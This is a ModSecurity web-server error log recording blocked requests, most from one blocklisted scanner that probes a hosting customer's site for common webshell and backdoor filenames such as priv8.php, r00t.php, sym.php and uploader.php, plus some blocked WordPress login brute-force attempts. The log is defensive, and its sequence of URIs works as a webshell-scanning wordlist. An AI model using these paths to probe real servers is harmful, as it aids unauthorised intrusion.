[Tue May 26 13:12:49.221659 2026] [security2:error] [pid 496740:tid 496920] [client 108.136.131.13:54602] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 13.131.136.108.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "agsnails.com"] [uri "/minishell.php"] [unique_id "ahVO-evOeft4ltnLrH4-0gAAADI"]
[Tue May 26 13:12:49.227292 2026] [security2:error] [pid 496740:tid 496902] [client 108.136.131.13:54577] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 13.131.136.108.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "agsnails.com"] [uri "/new-index.php"] [unique_id "ahVO-evOeft4ltnLrH4-1AAAACA"]
[Tue May 26 13:12:49.651861 2026] [security2:error] [pid 496740:tid 496964] [client 108.136.131.13:55665] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 13.131.136.108.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "agsnails.com"] [uri "/ok.php"] [unique_id "ahVO-evOeft4ltnLrH4-4gAAAF4"]
[Tue May 26 13:12:49.655409 2026] [security2:error] [pid 496740:tid 496908] [client 108.136.131.13:55659] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 13.131.136.108.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "agsnails.com"] [uri "/o.php"] [unique_id "ahVO-evOeft4ltnLrH4-4wAAACY"]
[Tue May 26 13:12:49.656871 2026] [security2:error] [pid 496740:tid 496931] [client 108.136.131.13:55614] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 13.131.136.108.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "agsnails.com"] [uri "/NewFile.php"] [unique_id "ahVO-evOeft4ltnLrH4-5AAAAD0"]
[Tue May 26 13:12:49.659871 2026] [security2:error] [pid 496740:tid 496955] [client 108.136.131.13:55647] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 13.131.136.108.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "agsnails.com"] [uri "/nn.php"] [unique_id "ahVO-evOeft4ltnLrH4-5QAAAFU"]
[Tue May 26 13:12:49.666657 2026] [security2:error] [pid 496740:tid 496956] [client 108.136.131.13:55634] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 13.131.136.108.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "agsnails.com"] [uri "/ninja.php"] [unique_id "ahVO-evOeft4ltnLrH4-5gAAAFY"]
[Tue May 26 13:12:50.089388 2026] [security2:error] [pid 496740:tid 496917] [client 108.136.131.13:55869] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 13.131.136.108.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "agsnails.com"] [uri "/phpinfo.php"] [unique_id "ahVO-uvOeft4ltnLrH4--QAAAC8"]
[Tue May 26 13:12:50.089908 2026] [security2:error] [pid 496740:tid 496965] [client 108.136.131.13:55880] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 13.131.136.108.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "agsnails.com"] [uri "/pi.php"] [unique_id "ahVO-uvOeft4ltnLrH4--gAAAF8"]
[Tue May 26 13:12:50.097907 2026] [security2:error] [pid 496740:tid 496919] [client 108.136.131.13:55882] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 13.131.136.108.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "agsnails.com"] [uri "/priv8.php"] [unique_id "ahVO-uvOeft4ltnLrH4--wAAADE"]
[Tue May 26 13:12:50.109219 2026] [security2:error] [pid 496740:tid 496966] [client 108.136.131.13:55865] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 13.131.136.108.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "agsnails.com"] [uri "/p.php"] [unique_id "ahVO-uvOeft4ltnLrH4-_QAAAGA"]
[Tue May 26 13:12:50.109668 2026] [security2:error] [pid 496740:tid 496971] [client 108.136.131.13:55881] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 13.131.136.108.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "agsnails.com"] [uri "/priv.php"] [unique_id "ahVO-uvOeft4ltnLrH4-_AAAAGU"]
[Tue May 26 13:12:50.140976 2026] [security2:error] [pid 496740:tid 496934] [client 57.141.2.47:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVO-evOeft4ltnLrH4-6QAAAEA"]
[Tue May 26 13:12:50.527584 2026] [security2:error] [pid 496740:tid 496954] [client 108.136.131.13:56225] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 13.131.136.108.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "agsnails.com"] [uri "/qindex.php"] [unique_id "ahVO-uvOeft4ltnLrH4_CQAAAFQ"]
[Tue May 26 13:12:50.532365 2026] [security2:error] [pid 496740:tid 496980] [client 108.136.131.13:56232] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 13.131.136.108.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "agsnails.com"] [uri "/radio.php"] [unique_id "ahVO-uvOeft4ltnLrH4_CgAAAG4"]
[Tue May 26 13:12:50.536276 2026] [security2:error] [pid 496740:tid 496985] [client 108.136.131.13:56228] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 13.131.136.108.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "agsnails.com"] [uri "/r.php"] [unique_id "ahVO-uvOeft4ltnLrH4_CwAAAHM"]
[Tue May 26 13:12:50.537845 2026] [security2:error] [pid 496740:tid 496948] [client 108.136.131.13:56230] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 13.131.136.108.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "agsnails.com"] [uri "/r00t.php"] [unique_id "ahVO-uvOeft4ltnLrH4_DAAAAE4"]
[Tue May 26 13:12:50.547043 2026] [security2:error] [pid 496740:tid 496997] [client 108.136.131.13:56224] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 13.131.136.108.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "agsnails.com"] [uri "/q.php"] [unique_id "ahVO-uvOeft4ltnLrH4_DQAAAH8"]
[Tue May 26 13:12:50.968955 2026] [security2:error] [pid 496740:tid 496908] [client 108.136.131.13:56508] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 13.131.136.108.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "agsnails.com"] [uri "/radio.php"] [unique_id "ahVO-uvOeft4ltnLrH4_IAAAACY"]
[Tue May 26 13:12:50.975182 2026] [security2:error] [pid 496740:tid 496931] [client 108.136.131.13:56509] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 13.131.136.108.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "agsnails.com"] [uri "/raw.php"] [unique_id "ahVO-uvOeft4ltnLrH4_IQAAAD0"]
[Tue May 26 13:12:50.975338 2026] [security2:error] [pid 496740:tid 496955] [client 108.136.131.13:56511] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 13.131.136.108.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "agsnails.com"] [uri "/readme.php"] [unique_id "ahVO-uvOeft4ltnLrH4_IgAAAFU"]
[Tue May 26 13:12:50.983360 2026] [security2:error] [pid 496740:tid 496956] [client 108.136.131.13:56513] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 13.131.136.108.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "agsnails.com"] [uri "/rss.php"] [unique_id "ahVO-uvOeft4ltnLrH4_IwAAAFY"]
[Tue May 26 13:12:51.004524 2026] [security2:error] [pid 496740:tid 496991] [client 108.136.131.13:56512] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 13.131.136.108.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "agsnails.com"] [uri "/root.php"] [unique_id "ahVO--vOeft4ltnLrH4_JAAAAHk"]
[Tue May 26 13:12:51.434188 2026] [security2:error] [pid 496740:tid 496977] [client 108.136.131.13:56839] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 13.131.136.108.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "agsnails.com"] [uri "/shl.php"] [unique_id "ahVO--vOeft4ltnLrH4_MQAAAGs"]
[Tue May 26 13:12:51.440789 2026] [security2:error] [pid 496740:tid 496984] [client 108.136.131.13:56843] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 13.131.136.108.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "agsnails.com"] [uri "/shx.php"] [unique_id "ahVO--vOeft4ltnLrH4_MgAAAHI"]
[Tue May 26 13:12:51.440960 2026] [security2:error] [pid 496740:tid 496934] [client 108.136.131.13:56836] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 13.131.136.108.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "agsnails.com"] [uri "/s.php"] [unique_id "ahVO--vOeft4ltnLrH4_MwAAAEA"]
[Tue May 26 13:12:51.441192 2026] [security2:error] [pid 496740:tid 496890] [client 108.136.131.13:56838] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 13.131.136.108.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "agsnails.com"] [uri "/seo.php"] [unique_id "ahVO--vOeft4ltnLrH4_NAAAABQ"]
[Tue May 26 13:12:51.447715 2026] [security2:error] [pid 496740:tid 496943] [client 108.136.131.13:56837] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 13.131.136.108.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "agsnails.com"] [uri "/send.php"] [unique_id "ahVO--vOeft4ltnLrH4_NQAAAEk"]
[Tue May 26 13:12:51.657740 2026] [security2:error] [pid 496740:tid 496859] [remote 207.180.219.73:33842] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 73.219.180.207.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "jhonweb.com"] [uri "/wp-login.php"] [unique_id "ahVO--vOeft4ltnLrH4_NgAAOnY"]
[Tue May 26 13:12:51.870754 2026] [security2:error] [pid 496740:tid 496980] [client 108.136.131.13:57113] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 13.131.136.108.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "agsnails.com"] [uri "/sym.php"] [unique_id "ahVO--vOeft4ltnLrH4_RwAAAG4"]
[Tue May 26 13:12:51.870848 2026] [security2:error] [pid 496740:tid 496954] [client 108.136.131.13:57110] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 13.131.136.108.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "agsnails.com"] [uri "/simple.php"] [unique_id "ahVO--vOeft4ltnLrH4_RgAAAFQ"]
[Tue May 26 13:12:51.871945 2026] [security2:error] [pid 496740:tid 496985] [client 108.136.131.13:57116] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 13.131.136.108.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "agsnails.com"] [uri "/sym403.php"] [unique_id "ahVO--vOeft4ltnLrH4_SAAAAHM"]
[Tue May 26 13:12:51.879426 2026] [security2:error] [pid 496740:tid 496948] [client 108.136.131.13:57115] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 13.131.136.108.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "agsnails.com"] [uri "/Sym.php"] [unique_id "ahVO--vOeft4ltnLrH4_SQAAAE4"]
[Tue May 26 13:12:51.886845 2026] [security2:error] [pid 496740:tid 496923] [client 108.136.131.13:57112] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 13.131.136.108.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "agsnails.com"] [uri "/style.php"] [unique_id "ahVO--vOeft4ltnLrH4_SgAAADU"]
[Tue May 26 13:12:52.314529 2026] [security2:error] [pid 496740:tid 496884] [client 108.136.131.13:57381] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 13.131.136.108.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "agsnails.com"] [uri "/t.php"] [unique_id "ahVO_OvOeft4ltnLrH4_XwAAAA4"]
[Tue May 26 13:12:52.314726 2026] [security2:error] [pid 496740:tid 496878] [client 108.136.131.13:57384] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 13.131.136.108.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "agsnails.com"] [uri "/tes.php"] [unique_id "ahVO_OvOeft4ltnLrH4_YAAAAAg"]
[Tue May 26 13:12:52.317118 2026] [security2:error] [pid 496740:tid 496922] [client 108.136.131.13:57379] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 13.131.136.108.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "agsnails.com"] [uri "/symlink.php"] [unique_id "ahVO_OvOeft4ltnLrH4_YQAAADQ"]
[Tue May 26 13:12:52.318302 2026] [security2:error] [pid 496740:tid 496879] [client 108.136.131.13:57380] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 13.131.136.108.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "agsnails.com"] [uri "/sys.php"] [unique_id "ahVO_OvOeft4ltnLrH4_YgAAAAk"]
[Tue May 26 13:12:52.326557 2026] [security2:error] [pid 496740:tid 496995] [client 108.136.131.13:57385] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 13.131.136.108.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "agsnails.com"] [uri "/test.php"] [unique_id "ahVO_OvOeft4ltnLrH4_YwAAAH0"]
[Tue May 26 13:12:52.405449 2026] [security2:error] [pid 496740:tid 496988] [client 57.141.2.35:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVO--vOeft4ltnLrH4_VAAAAHY"]
[Tue May 26 13:12:52.750777 2026] [security2:error] [pid 496740:tid 496893] [client 108.136.131.13:57543] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 13.131.136.108.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "agsnails.com"] [uri "/tinyfilemanager.php"] [unique_id "ahVO_OvOeft4ltnLrH4_eAAAABc"]
[Tue May 26 13:12:52.751645 2026] [security2:error] [pid 496740:tid 496916] [client 108.136.131.13:57551] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 13.131.136.108.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "agsnails.com"] [uri "/unknown.php"] [unique_id "ahVO_OvOeft4ltnLrH4_eQAAAC4"]
[Tue May 26 13:12:52.755891 2026] [security2:error] [pid 496740:tid 496899] [client 108.136.131.13:57550] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 13.131.136.108.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "agsnails.com"] [uri "/u.php"] [unique_id "ahVO_OvOeft4ltnLrH4_egAAAB0"]
[Tue May 26 13:12:52.756226 2026] [security2:error] [pid 496740:tid 496968] [client 108.136.131.13:57552] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 13.131.136.108.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "agsnails.com"] [uri "/up.php"] [unique_id "ahVO_OvOeft4ltnLrH4_ewAAAGI"]
[Tue May 26 13:12:52.767179 2026] [security2:error] [pid 496740:tid 496904] [client 108.136.131.13:57559] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 13.131.136.108.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "agsnails.com"] [uri "/upfile.php"] [unique_id "ahVO_OvOeft4ltnLrH4_fAAAACI"]
[Tue May 26 13:12:53.194547 2026] [security2:error] [pid 496740:tid 496975] [client 108.136.131.13:58174] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 13.131.136.108.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "agsnails.com"] [uri "/uploader.php"] [unique_id "ahVO_evOeft4ltnLrH4_jAAAAGk"]
[Tue May 26 13:12:53.195193 2026] [security2:error] [pid 496740:tid 496975] [client 108.136.131.13:58203] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 13.131.136.108.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "agsnails.com"] [uri "/upgrade.php"] [unique_id "ahVO_evOeft4ltnLrH4_jQAAAGk"]
[Tue May 26 13:12:53.195705 2026] [security2:error] [pid 496740:tid 496872] [client 108.136.131.13:58196] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 13.131.136.108.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "agsnails.com"] [uri "/ups.php"] [unique_id "ahVO_evOeft4ltnLrH4_jgAAAAI"]
[Tue May 26 13:12:53.217173 2026] [security2:error] [pid 496740:tid 496967] [client 108.136.131.13:58191] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 13.131.136.108.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "agsnails.com"] [uri "/uploads.php"] [unique_id "ahVO_evOeft4ltnLrH4_kgAAAGE"]
[Tue May 26 13:12:53.223529 2026] [security2:error] [pid 496740:tid 496870] [client 108.136.131.13:58163] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 13.131.136.108.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "agsnails.com"] [uri "/upload.php"] [unique_id "ahVO_evOeft4ltnLrH4_kwAAAAA"]
[Tue May 26 13:12:53.645525 2026] [security2:error] [pid 496740:tid 496901] [client 108.136.131.13:59101] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 13.131.136.108.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "agsnails.com"] [uri "/usr.php"] [unique_id "ahVO_evOeft4ltnLrH4_pwAAAB8"]
[Tue May 26 13:12:53.649488 2026] [security2:error] [pid 496740:tid 496937] [client 108.136.131.13:59111] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 13.131.136.108.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "agsnails.com"] [uri "/wp_cron.php"] [unique_id "ahVO_evOeft4ltnLrH4_qAAAAEM"]
[Tue May 26 13:12:53.657993 2026] [security2:error] [pid 496740:tid 496945] [client 108.136.131.13:59104] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 13.131.136.108.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "agsnails.com"] [uri "/v.php"] [unique_id "ahVO_evOeft4ltnLrH4_qQAAAEs"]
[Tue May 26 13:12:53.665547 2026] [security2:error] [pid 496740:tid 496917] [client 108.136.131.13:59108] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 13.131.136.108.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "agsnails.com"] [uri "/vuln.php"] [unique_id "ahVO_evOeft4ltnLrH4_qgAAAC8"]
[Tue May 26 13:12:53.666708 2026] [security2:error] [pid 496740:tid 496950] [client 108.136.131.13:59110] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 13.131.136.108.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "agsnails.com"] [uri "/w.php"] [unique_id "ahVO_evOeft4ltnLrH4_qwAAAFA"]
[Tue May 26 13:12:53.708231 2026] [security2:error] [pid 496740:tid 496855] [remote 45.250.255.226:54228] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 226.255.250.45.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "shahvishaal.moes-art.com"] [uri "/wp-login.php"] [unique_id "ahVO_evOeft4ltnLrH4_oAAAHnI"]
[Tue May 26 13:12:54.090275 2026] [security2:error] [pid 496740:tid 496985] [client 108.136.131.13:59630] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 13.131.136.108.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "agsnails.com"] [uri "/wp_wrong_datlib.php"] [unique_id "ahVO_uvOeft4ltnLrH4_vQAAAHM"]
[Tue May 26 13:12:54.095898 2026] [security2:error] [pid 496740:tid 496948] [client 108.136.131.13:59654] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 13.131.136.108.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "agsnails.com"] [uri "/wp-access.php"] [unique_id "ahVO_uvOeft4ltnLrH4_wAAAAE4"]
[Tue May 26 13:12:54.100287 2026] [security2:error] [pid 496740:tid 496915] [client 108.136.131.13:59646] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 13.131.136.108.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "agsnails.com"] [uri "/wp-about.php"] [unique_id "ahVO_uvOeft4ltnLrH4_wQAAAC0"]
[Tue May 26 13:12:54.114417 2026] [security2:error] [pid 496740:tid 496927] [client 108.136.131.13:59636] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 13.131.136.108.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "agsnails.com"] [uri "/wp-.php"] [unique_id "ahVO_uvOeft4ltnLrH4_wgAAADk"]
